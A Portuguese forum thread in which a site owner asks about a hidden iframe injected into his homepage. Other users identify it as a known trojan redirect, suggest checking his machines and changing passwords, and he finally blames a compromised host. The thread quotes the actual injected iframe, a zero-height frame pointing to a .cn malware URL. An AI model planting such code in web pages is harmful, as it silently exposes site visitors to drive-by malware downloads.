iframe malicioso "apareceu" no meu código

[lf.almeida 0]

Tenho um site pessoal sobre linux, recém criado ( 5dias ) e hospedado na hostiex. Neste final de semana tive muitas dificuldades para acessar via ftp, via Cpanel e também não consegui acesso não-administrativo via navegador, da forma tradicional.

 

Depois de tentar várias vezes pelo navegador a página carregou. Percebi uma pequena, discreta e estranha linha logo no topo do site, olhei o código fonte e tinha o

seguinte:

 

<iframe src="http://alimamamm.cn/sky/ms.htm?vip8" width="100" height="0"></iframe>

Fiz uma pesquisa e o google retorna um aviso sinistro: "este site pode danificar o seu computador!"

 

Revisei todos os códigos php e xhtml que eu escrevi e não encontrei nenhuma entrada suspeita.

 

Alguém já viu isso?

 

Será que meu site foi "invadido" e tem algum script colocando este código na minha página?

 

Fiquei preocupado se algum usuário poderia pegar um vírus, ou algo parecido acessando a minha página.

 

Eu já enviei um email pra hostiex reclamando deste código, mas ainda não recebi nenhum retorno.

 

 

Valeu pessoal, obrigado.

[Alaerte Gabriel 662]

Entendi...

 

Qual a página que você viu esse código ?

[lf.almeida 0]

na página inicial /index.php

[hinom 5]

é um virus chinês.

 

qual S.O. você utiliza ?

[lf.almeida 0]

Para edição do site utilizo o Debian GNU/Linux 4 em casa e windows xp no trabalho.

[hinom 5]

sugiro que faça uma limpeza nas duas maquinas

[lf.almeida 0]

Cara, o xp do trabalho é original tem antivirus, antispyware atualizados que é passado ~ 1vez por semana,

 

Em casa eu uso Debian 4 versão estable, não sei se você conhece linux mas, não tem como pergar vírus. Meu computador de casa é muito seguro( firewall iptables restritivo e personalizado + squid + dansguardian + sarg.

 

Na minha casa não tem o que limpar. Tenho controle total da minha máquina em casa.

 

Desculpe minha falta de conhecimento (sou iniciante em php) mas, o que você quer dizer, mais especificamente, quando sugere esta limpeza na máquina?

 

Como meu site é novo, venho fazendo várias alterações e quase diariamente faço upload do site inteiro para o servidor da hostiex. Os arquivos são renovados sempre.

 

Como eu disse no meu primeiro post, eu notei o aparecimento deste iframe logo após uns dois dias de indisponibilidade do meu site.

 

No momento aguardo uma resposta da hostiex sobre o que pode ter acontecido.

 

O iframe não está mais no código, eu tenho checado regularmente os códigos depois disso.

 

Eu gostaria de saber de vocês se alguém ja tinha visto alguma coisa deste tipo, porque isto aconteceu, e se pode ter algum script mau intencionado no servidor gerando este código no meu index.php.

[hinom 5]

o xp do trabalho é original tem antivirus, antispyware atualizados que é passado ~ 1vez por semana,

está certo, porém, não garante nada.

antivirus detectam virus já conhecidos, obviamente que virus novos não serão detectados, a não ser que utilizem tecnicas já conhecidas.

 

além do mais, independentemente do sistema operacional, se um programa é executado com permissão adnminstrativa, por mais seguro que o sistema seja, se o programa for malicioso, ele será executado.

 

Em casa eu uso Debian 4 versão estable, não sei se você conhece linux mas, não tem como pergar vírus. Meu computador de casa é muito seguro( firewall iptables restritivo e personalizado + squid + dansguardian + sarg.

nenhum sistema é 100% seguro

existem sim, virus para linux

 

 

 

Eu gostaria de saber de vocês se alguém ja tinha visto alguma coisa deste tipo, porque isto aconteceu, e se pode ter algum script mau intencionado no servidor gerando este código no meu index.php.

esse virus é um trojan que apareceu aqui no vizinho, na china.

foi detectado há +-6 meses atrás.

ele abre um iframe que leva para um site que faz download silencioso de trojans

 

geralmente ele vem junto com cracks para piratear programas.

 

pode ser que o hosting que hospeda a sua página tenha se contaminado, mas de qualquer forma verifique os seus pcs.

[lf.almeida 0]

Vou verificar. obrigado.

[jgarcia 1]

Saiba mais:

http://g1.globo.com/Noticias/Tecnologia/0,...71-6174,00.html

http://info.abril.com.br/blog/virusebugs/2...tar.shtml?77988

http://www.forumpcs.com.br/noticia.php?b=232155

[lf.almeida 0]

Obrigado pelos links.

 

Muito interessantes.

 

Mas, não entendi onde é a falha que possibilita este tipo de coisa.

 

Não sou programador e tudo que eu sei de php é bem pouco, Usei "todo" conhecimento que adquiri para construir esta página.

 

Será que é o meu código que facilitou isso?

 

Será algum vírus no meu computador que faz isso?

 

Fiquei meio confuso...

 

Obrigado pela atenção de vocês.

[Gustavo Montes (Sys.GSM) 0]

Se o código que você tem na sua máquina não possui o iframe provavelmente a inclusão dele ocorreu no servidor. Neste caso pode ser que o servidor tenha sido infectado ou então a sua senha vazou e permitiu que alguém modificasse o arquivo e enviasse para o servidor. De qualquer maneira altere todas as senhas do site e de uso pessoal.

[lf.almeida 0]

Obrigado pela dica, vou mudar as senhas agora mesmo !

[lf.almeida 0]

O problema era mesmo com o hosting. Troquei de hospedagem e não deu mais nenhum problema.

[hgb7 3]

Host Contaminado é dose...